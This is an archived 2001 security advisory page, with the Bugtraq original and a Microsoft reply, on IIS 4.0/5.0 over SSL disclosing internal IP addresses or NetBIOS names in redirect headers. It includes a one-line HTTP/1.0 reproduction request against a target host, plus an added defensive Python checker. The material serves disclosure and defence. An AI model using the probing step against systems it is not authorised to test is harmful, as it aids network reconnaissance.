SecurityTracker.com

SecurityTracker Archives

Category:   Application (Web Server/CGI)  >   Microsoft Internet Information Server (IIS) Web Server Vendors:   Microsoft
(Knowledge Base Article Covers This Issue) Re: Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users
SecurityTracker Alert ID:  1002171
SecurityTracker URL:  http://securitytracker.com/id/1002171
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 10 2001
Impact:   Disclosure of system information
Fix Available:  Yes  
Version(s): 4.0 with SSL, 5.0 with SSL
Description:   A vulnerability reported by e-Synergies in Microsoft's IIS web server allows remote users to determine the internal IP address, or the internal NetBIOS host name, used by the web server.

A remote user can connect to the web server using SSL (on TCP port 443) and retrieve internal IP addresses or determine the host's network node hostname.

The following steps can be followed to trigger the vulnerability:

1- Browse the web site using a normal SSL browser and find any directory (i.e., https://[targethost]/images/icon.gif).

2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of [targethost]:

GET /images HTTP/1.0

3- The result returned by the secure web server should look like this:

HTTP/1.1 302 Object Moved
Location: https://192.168.1.10/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

or

HTTP/1.1 302 Object Moved
Location: https://netbiosname/images/
Server: Microsoft-IIS/4.0
Content-Type: text/html
Content-Length: xxx

It is reported that using HTTP/1.1 in the request instead of HTTP/1.0 will not give the same results.
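As an added defender-side check (example code written for this page; it is not part of the advisory, of SecurityTracker's text, or of Microsoft's KB article): the script below parses a raw HTTP response such as the ones shown above and flags a Location or Content-Location header whose host is a private IP address or a bare single-label NetBIOS-style name rather than the site's public FQDN. Content-Location is included because it is the header named in the title of Q218180. The sample responses are constructed, and the expected name `www.example.com` is an assumption. Run against a response captured after the KB change is applied, it should return no findings. On the HTTP/1.1 remark above: an HTTP/1.1 request carries a Host header that the server can echo back in the redirect, which is why the HTTP/1.0 request without one exposes the server's own idea of its name.

```python
import ipaddress
from urllib.parse import urlsplit

# Headers in which IIS 4.0/5.0 could emit the server's own address or name:
# Location on the 302 redirect shown in the advisory, and Content-Location,
# the header named in the title of KB Q218180.
CHECKED_HEADERS = ("location", "content-location")


def parse_response(raw: str):
    """Split a raw HTTP response into (status code, {lower-case header: value}).

    Only the status line and header block are needed; the body is ignored.
    """
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return status, headers


def classify_host(host: str, expected_fqdn: str) -> str:
    """Classify the host part of a redirect target.

    "ok"            matches the public FQDN the server should be using
    "private-ip"    RFC 1918, loopback or link-local literal (192.168.1.10 above)
    "bare-hostname" single-label name, e.g. a NetBIOS computer name
    "public-ip"     any other literal address
    "other-name"    a dotted name that is not the expected FQDN
    """
    host = host.lower().rstrip(".")
    if host == expected_fqdn.lower().rstrip("."):
        return "ok"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "bare-hostname" if "." not in host else "other-name"
    return "private-ip" if addr.is_private else "public-ip"


def check_response(raw: str, expected_fqdn: str):
    """Return a list of (header, host, verdict) for every header that leaks."""
    _status, headers = parse_response(raw)
    findings = []
    for name in CHECKED_HEADERS:
        value = headers.get(name)
        if not value:
            continue
        host = urlsplit(value).hostname  # strips scheme, port, brackets, userinfo
        if host is None:
            continue
        verdict = classify_host(host, expected_fqdn)
        if verdict != "ok":
            findings.append((name, host, verdict))
    return findings


# Constructed sample responses modelled on the advisory. The Content-Length
# values are made up; the advisory shows "xxx".
LEAKS_PRIVATE_IP = (
    "HTTP/1.1 302 Object Moved\r\n"
    "Location: https://192.168.1.10/images/\r\n"
    "Server: Microsoft-IIS/4.0\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 141\r\n"
    "\r\n"
)
LEAKS_NETBIOS_NAME = (
    "HTTP/1.1 302 Object Moved\r\n"
    "Location: https://netbiosname/images/\r\n"
    "Server: Microsoft-IIS/4.0\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 141\r\n"
    "\r\n"
)
# What a server configured to send its FQDN (the KB article's fix) returns.
USES_FQDN = (
    "HTTP/1.1 302 Object Moved\r\n"
    "Location: https://www.example.com/images/\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 141\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for label, sample in (("private IP", LEAKS_PRIVATE_IP),
                          ("NetBIOS name", LEAKS_NETBIOS_NAME),
                          ("fixed", USES_FQDN)):
        print(label, "->", check_response(sample, "www.example.com") or "no leak")
```

The check is deliberately conservative: a redirect to a different but fully qualified name is reported as "other-name" rather than treated as a leak, because a server may legitimately redirect between public hosts, while any literal private address or single-label name in these headers is exactly the behaviour the KB article exists to turn off.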

Impact:   A remote user can determine internal IP addresses used by the web server or internal NetBIOS host names used by the web server.
Solution:   There is a Knowledge Base article that covers this issue. The article reportedly contains information on how to force IIS to use the fully qualified domain name (FQDN) instead of the IP address.

The article is titled: (Q218180) Internet Information Server Returns IP Address in HTTP Header (Content-Location)

The article is available at:
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180

Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 8 2001 Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users



Source Message Contents

Subject:  RE: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


The checklists for securing IIS4 and IIS5 discuss this issue.
Specifically:

"Disable IP Address in Content-Location 
The Content-Location header may expose internal IP addresses that are
usually hidden or masked behind a Network Address Translation (NAT)
Firewall or proxy server. Refer to Q218180 for further information about
disabling this option."

The referenced Knowledge Base Article contains information on how to
force IIS to use the FQDN instead of the IP address.  

(Q218180) Internet Information Server Returns IP Address in HTTP Header
(Content-Location) -
http://support.microsoft.com/directory/article.asp?id=KB;EN-US;Q218180
"There is a value that can be modified in the IIS metabase to change the
default behavior from exposing IP addresses to send the FQDN instead.
This allows the IP address to be masked by the domain name."


The IIS4 checklist is available here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iischk.asp

And the IIS5 checklist here:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/tools/iis5chk.asp

Regards,

Secure@Microsoft.com

-----Original Message-----
From: Marek Roy [mailto:marek_roy@hotmail.com] 
Sent: Tuesday, August 07, 2001 9:55 PM
To: bugtraq@securityfocus.com
Subject: Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0


GGS-AU / e-Synergies Security Advisory

August 8, 2001

Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0

Synopsis:

e-Synergies has discovered and researched a remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as the internal IP address or internal host name.

Affected Versions:

Microsoft IIS 4.0 running SSL
Microsoft IIS 5.0 running SSL

Description:

By connecting manually to port TCP/443 (SSL) using Perl (SSLeay) or any other tool, a remote user has the ability to retrieve the internal IP address or reveal the machine's network node hostname.

Exploit:

1-      Browse the web site using a normal SSL browser and find any directory. I.E.: https://www.target.com/images/icon.gif

2-      Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com:

        GET /images HTTP/1.0

3-      The result should look like this:

        HTTP/1.1 302 Object Moved
        Location: https://192.168.1.10/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

        or

        HTTP/1.1 302 Object Moved
        Location: https://netbiosname/images/
        Server: Microsoft-IIS/4.0
        Content-Type: text/html
        Content-Length: xxx

Remarks:

Using HTTP/1.1 instead of HTTP/1.0 will not give the same result.

Credits:

Marek Roy
Senior IT Security Consultant

Please send suggestions, updates, and comments to:

GGS-AU / e-synergies, Sydney, Australia
Level 9
65 York Street
Sydney NSW 2001
Australia

Phone: +61 2 9279 2533
Fax: +61 2 9279 2544
Email: enquiries@ggs-au.com
http://www.ggs-au.com

